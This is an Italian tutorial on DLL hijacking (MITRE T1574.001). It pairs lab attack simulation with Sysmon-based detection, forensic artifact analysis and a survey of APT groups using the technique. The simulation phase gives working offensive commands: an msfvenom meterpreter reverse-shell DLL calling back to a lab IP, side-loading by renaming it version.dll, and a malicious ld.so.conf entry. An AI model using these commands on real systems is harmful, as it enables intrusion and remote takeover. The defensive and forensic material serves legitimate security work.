Dirottamento di DLL: Hijack Execution Flow — DLL (T1574.001)

La simulazione del DLL hijacking in laboratorio richiede tre fasi distinte: scoperta delle opportunità, creazione del payload e verifica dell'esecuzione. Ogni fase utilizza strumenti diversi, ed è fondamentale operare in un ambiente isolato per evitare impatti accidentali.

Fase 1 — Enumerazione delle opportunità di hijacking. Lo strumento più efficace per identificare DLL mancanti è Process Monitor di Sysinternals (gratuito). Avviatelo con un filtro sulla colonna Result impostato su NAME NOT FOUND e sulla colonna Path con suffisso .dll. Eseguendo applicazioni target si osserveranno immediatamente tutte le librerie cercate ma non trovate — ciascuna rappresenta un'opportunità di phantom DLL hijacking.

Per un approccio sistematico su scala enterprise, il modulo PowerUp di PowerSploit (open source) automatizza la ricerca di directory scrivibili nel PATH e di servizi vulnerabili:

Import-Module .\PowerUp.ps1; Find-ProcessDLLHijack Find-PathDLLHijack

Il primo comando enumera i processi attivi e verifica se le loro directory di caricamento DLL sono scrivibili dall'utente corrente; il secondo analizza le directory nel PATH di sistema alla ricerca di permessi deboli.

Fase 2 — Creazione della DLL malevola. Con msfvenom (open source, parte di Metasploit Framework) si genera una DLL che esegue codice arbitrario:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP_LAB> LPORT=4443 -f dll -o payload.dll

Per scenari più realistici dove il processo vittima non deve crashare, si utilizza il DLL proxying: la DLL malevola esporta le stesse funzioni della libreria originale, inoltrando le chiamate alla DLL legittima dopo aver eseguito il payload. Il tool SharpDLLProxy (open source) automatizza la generazione del sorgente C necessario partendo dall'analisi delle export della DLL originale.

Fase 3 — Side-loading con binario firmato. Molti gruppi APT nei dati analizzati utilizzano binari legittimi firmati come veicolo. Un classico scenario di laboratorio prevede l'uso di un eseguibile legittimo noto per caricare DLL dalla propria directory. Ad esempio, posizionando la DLL malevola rinominata come version.dll nella stessa cartella di un eseguibile Microsoft vulnerabile al search order hijacking, l'esecuzione del binario legittimo innesca il caricamento del payload.

Per verificare che l'esecuzione sia avvenuta nel contesto del processo firmato, controllate con:

tasklist /m payload.dll

Su Linux, per simulare scenari equivalenti di shared library hijacking, si può manipolare la variabile LD_PRELOAD o inserire librerie malevole in percorsi prioritari di ld.so:

echo "/tmp/malicious" > /etc/ld.so.conf.d/evil.conf && ldconfig

Empire (open source) offre moduli analoghi per l'enumerazione e lo sfruttamento automatizzato delle debolezze DLL, mentre Brute Ratel C4 (a pagamento) include funzionalità native di search order hijacking, confezionando payload all'interno di container ISO con binari legittimi e DLL malevole affiancati.

Il rilevamento del DLL hijacking si gioca sulla correlazione tra tre sorgenti: il caricamento dei moduli, le modifiche al file system e le alterazioni del Registry. L'analisi DET0201 (AN0577) definisce esattamente questo approccio multi-segnale, ma tradurlo in regole operative richiede attenzione chirurgica ai falsi positivi.

La sorgente primaria è Sysmon (gratuito), in particolare l'EventID 7 (Image Loaded), che registra ogni DLL caricata da ogni processo con hash, firma e percorso completo. La regola cardine è: un processo firmato Microsoft che carica una DLL non firmata da una directory non standard merita investigazione immediata. Questo schema copre simultaneamente side-loading, search order hijacking e phantom DLL hijacking.

Configurate Sysmon con una policy che includa il logging dell'EventID 7 filtrato sulle DLL non firmate. La configurazione di Sysmon deve bilanciare visibilità e volume: registrare ogni singolo caricamento DLL genera rumore insostenibile. Partite da una regola che cattura i caricamenti dove Signed=false e il percorso dell'immagine risiede fuori da C:\Windows\System32 e C:\Windows\SysWOW64.

Il secondo livello di detection opera sul file system. L'EventID 11 di Sysmon (FileCreate) segnala la creazione di nuovi file .dll in directory sensibili — la cartella di installazione di applicazioni legittime, %WINDIR%\System32, e le directory nel PATH. Correlare la creazione di una DLL (EventID 11) seguita dal suo caricamento (EventID 7) entro una finestra temporale configurabile (parametro [TimeWindow] della strategia DET0201) aumenta significativamente la confidenza dell'alert.

Per la componente Registry, monitorate l'EventID 13 di Sysmon per modifiche alla chiave HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs e alla chiave SafeDLLSearchMode. Qualsiasi modifica a questi valori al di fuori di una finestra di manutenzione pianificata è un indicatore ad alta fedeltà.

La gestione dei falsi positivi è il vero banco di prova. Il parametro [ProcessAllowList] deve includere tool di sviluppo come Visual Studio e ambienti di build che legittimamente caricano DLL da percorsi non standard. Il parametro [AllowedDllPaths] definisce le directory sicure da escludere. Il [HashBaseline] è forse il controllo più potente: mantenete un inventario degli hash delle DLL legittime e generate alert quando una DLL con lo stesso nome ma hash diverso appare nel percorso atteso — questo rileva direttamente la DLL substitution.

Come controlli preventivi, abilitate il Safe DLL Search Mode via Registry e valutate l'implementazione di policy WDAC (a pagamento, incluso in Windows Enterprise) o AppLocker per imporre il caricamento esclusivo di DLL firmate. Wazuh (open source) e OSSEC (open source) offrono file integrity monitoring cross-platform per rilevare sostituzioni di librerie.

L'analisi forense del DLL hijacking richiede la ricostruzione precisa della sequenza: deposito della DLL malevola, attivazione del caricamento, ed eventuale persistenza. Gli artefatti sono distribuiti tra file system, registro eventi e Registry, e la correlazione temporale tra essi è ciò che trasforma indizi isolati in una narrativa coerente.

Il punto di partenza è il file system. Utilizzate MFTECmd (open source, parte di Eric Zimmerman's Tools) per analizzare la Master File Table NTFS ed estrarre i timestamp di creazione delle DLL sospette:

MFTECmd.exe -f "$MFT" --csv output_dir

Nel CSV risultante, filtrate per estensione .dll e cercate file creati in directory insolite — la cartella di installazione di applicazioni legittime come Chrome, TeamViewer, 7-Zip o Kaspersky AV, che i dati APT mostrano come target ricorrenti. Confrontate il timestamp $STANDARD_INFORMATION con il $FILE_NAME: una discrepanza indica timestomping, tecnica spesso abbinata al DLL hijacking per occultare l'inserimento.

Il secondo artefatto critico sono gli Amcache e Shimcache. Amcache (C:\Windows\appcompat\Programs\Amcache.hve) registra hash SHA1 e percorso delle DLL caricate, consentendo di verificare se una DLL sospetta è stata eseguita e quando è apparsa per la prima volta nel sistema. Analizzatelo con AmcacheParser (open source):

AmcacheParser.exe -f Amcache.hve --csv output_dir

Lo Shimcache (AppCompatCache nel Registry SYSTEM) offre una cronologia dei file eseguiti o presenti nel sistema. AppCompatCacheParser (open source) estrae queste informazioni in formato analizzabile.

Per la componente eventi, i log Sysmon sono fondamentali: l'EventID 7 documenta ogni caricamento DLL con hash e firma. In assenza di Sysmon, il log Security con policy di auditing avanzata registra eventi di accesso ai file e creazione processi (EventID 4688). Cercate processi legittimi — ad esempio MsMpEng.exe, SecurityHealthService.exe, explorer.exe — che caricano DLL da percorsi inattesi.

Le campagne documentate offrono pattern investigativi concreti. Nella campagna RedDelta Modified PlugX Infection Chain Operations (C0047), Mustang Panda ha sfruttato il search order hijacking su applicazioni vulnerabili per installare payload PlugX: cercate la triade eseguibile legittimo + DLL loader + payload cifrato nella stessa directory. Nella campagna 3CX Supply Chain Attack (C0057), il servizio IKEEXT di Windows è stato abusato per caricare la DLL TAXHAUL con privilegi LocalSystem — verificate la presenza di DLL anomale associate a questo servizio in C:\Windows\System32. Nella campagna APT41 DUST (C0040), la catena prevedeva DLL side-loading tramite un uninstaller AhnLab legittimo per eseguire DUSTTRAP. Durante Operation CuckooBees (C0012), i servizi IKEEXT e PrintNotify sono stati utilizzati per il side-loading.

Consolidate la timeline con Timeline Explorer (open source) importando i CSV da tutti i parser. Ordinate per timestamp e cercate cluster di attività: creazione DLL → primo caricamento in Amcache → eventi Sysmon EventID 7 → eventuale creazione di chiavi Registry per persistenza. Questa sequenza, compressa in pochi minuti, è la firma del DLL hijacking operativo.

Il DLL hijacking è una tecnica trasversale adottata da 32 gruppi APT con motivazioni e sofisticazione molto diverse. L'analisi dei pattern di utilizzo rivela cluster operativi distinti che aiutano a profilare gli attori e anticipare le loro mosse.

Il primo cluster è dominato dai gruppi orientati verso il Sud-Est asiatico e il cyberspionaggio. Mustang Panda (G0129) rappresenta l'esempio più documentato, con la campagna RedDelta Modified PlugX Infection Chain Operations (C0047) attiva dal 2023 al 2024 contro entità in Asia orientale e sudorientale. Il gruppo utilizza il search order hijacking per installare PlugX (S0013), un RAT che a sua volta supporta nativamente sia il search order hijacking che il side-loading. Daggerfly (G1034) condivide lo stesso ecosistema di tool, impiegando software legittimo per side-loadare loader PlugX. Velvet Ant (G1047) segue un pattern identico, eseguendo PlugX tramite DLL search order hijacking con EXE legittimi. Questo triangolo Mustang Panda–Daggerfly–Velvet Ant, unito dall'uso comune di PlugX, suggerisce un ecosistema di sviluppo condiviso o un fornitore comune di tool.

Il secondo cluster ruota attorno ad APT41 (G0096) e alla sua galassia. La campagna APT41 DUST (C0040) ha colpito entità in Europa, Asia e Medio Oriente dal 2023 al 2024, combinando search order hijacking e side-loading per eseguire DUSTTRAP. La Operation CuckooBees (C0012), attribuita ad attori affiliati a Winnti Group e APT41, ha preso di mira il settore manifatturiero e tecnologico dal 2019, abusando dei servizi Windows IKEEXT e PrintNotify. Cinnamon Tempest (G1021) mostra sovrapposizioni operative utilizzando sia il search order hijacking per Cobalt Strike Beacon sia il side-loading di DLL weaponizzate.

Il terzo cluster comprende gruppi con focus su intelligence diplomatica e militare. APT32 (G0050) side-loada backdoor tramite eseguibili firmati Symantec e McAfee, incluso AcroTranscoder. menuPass (G0045) utilizza il side-loading per eseguire versioni di Mimikatz, PwDump6 e il backdoor UPPERCUT, combinando hijacking e side-loading nella stessa operazione. Lazarus Group (G0032) ha dimostrato un approccio particolarmente creativo sostituendo win_fw.dll, componente interno dell'installer di IDA Pro, con una DLL malevola — un attacco supply chain localizzato.

Un pattern emergente riguarda la scelta dei binari legittimi come veicolo. I software antivirus sono fra i target preferiti: Kaspersky AV è abusato da Threat Group-3390 (G0027), Sakula (S0074) e BOOKWORM (S1226); McAfee è sfruttato da APT32 e MirageFox (S0280); Windows Defender (MsMpEng.exe) appare nelle catene di Clambling (S0660), Aquatic Panda (G0143) e BOOKWORM. La scelta non è casuale: questi eseguibili sono firmati, spesso esclusi dalle scansioni EDR e talvolta eseguiti con privilegi elevati.

La campagna 3CX Supply Chain Attack (C0057) rappresenta un'evoluzione significativa: il primo caso pubblico di compromissione supply chain a cascata, dove AppleJeus ha frammentato funzionalità tra più DLL e sfruttato il servizio IKEEXT per la persistenza con privilegi LocalSystem. Questo modello di frammentazione — dove il payload è distribuito tra più DLL con export functions separate — rende l'analisi statica significativamente più complessa ed è un trend in crescita.

Framework MITRE ATT&CK v16 — T1574.001 (Hijack Execution Flow: DLL). Campagne: C0047, C0057, C0040, C0012. Detection: DET0201 (AN0577). Mitigazioni: M1038, M1044, M1051, M1047, M1013. Tool di detection citati: Sysmon, Wazuh, OSSEC, PowerSploit PowerUp, MFTECmd, AmcacheParser, AppCompatCacheParser, Timeline Explorer. Integrato con conoscenza professionale per tool e procedure operative.